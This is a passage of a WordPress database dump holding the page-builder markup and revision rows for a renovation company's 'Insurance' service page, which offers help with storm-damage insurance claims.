type=\"text/css\"> .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-64bd9830-1dd5-4212-b98b-e29fc494f308 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"13d889c9-a6a7-4730-aeec-052e90c082e8\"} -->\n<style type=\"text/css\"> .block-13d889c9-a6a7-4730-aeec-052e90c082e8 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-13d889c9-a6a7-4730-aeec-052e90c082e8 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-13d889c9-a6a7-4730-aeec-052e90c082e8 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-13d889c9-a6a7-4730-aeec-052e90c082e8 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-13d889c9-a6a7-4730-aeec-052e90c082e8 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-13d889c9-a6a7-4730-aeec-052e90c082e8\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"25369b66-a5b1-47d5-9393-ea242ec8ece8\"} -->\n<style type=\"text/css\"> .block-id-25369b66-a5b1-47d5-9393-ea242ec8ece8 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-25369b66-a5b1-47d5-9393-ea242ec8ece8 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-25369b66-a5b1-47d5-9393-ea242ec8ece8 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-25369b66-a5b1-47d5-9393-ea242ec8ece8 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/78c60d20331198e3173e4ef3aceda1e4.jpg\" alt=\"\" data-id=\"458\" data-link=\"https://cteisys.com/services/insurance/78c60d20331198e3173e4ef3aceda1e4/\" class=\"wp-image-458\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/Capture.jpg\" alt=\"\" data-id=\"459\" data-link=\"https://cteisys.com/services/insurance/capture/\" class=\"wp-image-459\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/repair1.jpg\" alt=\"\" data-id=\"460\" data-link=\"https://cteisys.com/services/insurance/repair1/\" class=\"wp-image-460\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Insurance','','publish','closed','closed','','insurance','','','2022-08-23 19:07:09','2022-08-23 19:07:09','',160,'https://sktperfectdemo.com/themepack/gbrenovate/?page_id=226',0,'page','',0),(462,1,'2022-08-23 19:07:09','2022-08-23 19:07:09','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"602ffb7e-28cc-4efb-b1a9-b82116ccde3c\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"c3da108a-9f74-4c6a-b160-7db1573b31fd\"} -->\n<style type=\"text/css\"> .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-c3da108a-9f74-4c6a-b160-7db1573b31fd skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"e200d26a-3c92-4d1c-873a-846519bc681e\"} -->\n<style type=\"text/css\"> .block-e200d26a-3c92-4d1c-873a-846519bc681e .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-e200d26a-3c92-4d1c-873a-846519bc681e .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-e200d26a-3c92-4d1c-873a-846519bc681e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-e200d26a-3c92-4d1c-873a-846519bc681e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e200d26a-3c92-4d1c-873a-846519bc681e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-e200d26a-3c92-4d1c-873a-846519bc681e\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"793d8a43-7706-4aa2-ae62-65cce7fc4e0f\"} -->\n<style type=\"text/css\"> .block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"731771dc-fea2-4707-b3ae-e7328f6679c5\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-731771dc-fea2-4707-b3ae-e7328f6679c5\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Insurance</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph -->\n<p>We can assist you through your claims process to insure you have a stress free experience. Damage from downed trees, wind and hail storms may qualify for up to 100% cost coverage by your insurance company. Call Dunrite today for a free inspection to gain helpful insight into the claims process.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"64bd9830-1dd5-4212-b98b-e29fc494f308\"} -->\n<style type=\"text/css\"> .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-64bd9830-1dd5-4212-b98b-e29fc494f308 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"13d889c9-a6a7-4730-aeec-052e90c082e8\"} -->\n<style type=\"text/css\"> .block-13d889c9-a6a7-4730-aeec-052e90c082e8 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-13d889c9-a6a7-4730-aeec-052e90c082e8 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-13d889c9-a6a7-4730-aeec-052e90c082e8 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-13d889c9-a6a7-4730-aeec-052e90c082e8 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-13d889c9-a6a7-4730-aeec-052e90c082e8 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-13d889c9-a6a7-4730-aeec-052e90c082e8\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"25369b66-a5b1-47d5-9393-ea242ec8ece8\"} -->\n<style type=\"text/css\"> .block-id-25369b66-a5b1-47d5-9393-ea242ec8ece8 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-25369b66-a5b1-47d5-9393-ea242ec8ece8 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-25369b66-a5b1-47d5-9393-ea242ec8ece8 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-25369b66-a5b1-47d5-9393-ea242ec8ece8 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/78c60d20331198e3173e4ef3aceda1e4.jpg\" alt=\"\" data-id=\"458\" data-link=\"https://cteisys.com/services/insurance/78c60d20331198e3173e4ef3aceda1e4/\" class=\"wp-image-458\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/Capture.jpg\" alt=\"\" data-id=\"459\" data-link=\"https://cteisys.com/services/insurance/capture/\" class=\"wp-image-459\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/repair1.jpg\" alt=\"\" data-id=\"460\" data-link=\"https://cteisys.com/services/insurance/repair1/\" class=\"wp-image-460\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Insurance','','inherit','closed','closed','','226-revision-v1','','','2022-08-23 19:07:09','2022-08-23 19:07:09','',226,'https://cteisys.com/?p=462',0,'revision','',0),(461,1,'2022-08-23 19:05:36','2022-08-23 19:05:36','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"602ffb7e-28cc-4efb-b1a9-b82116ccde3c\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c 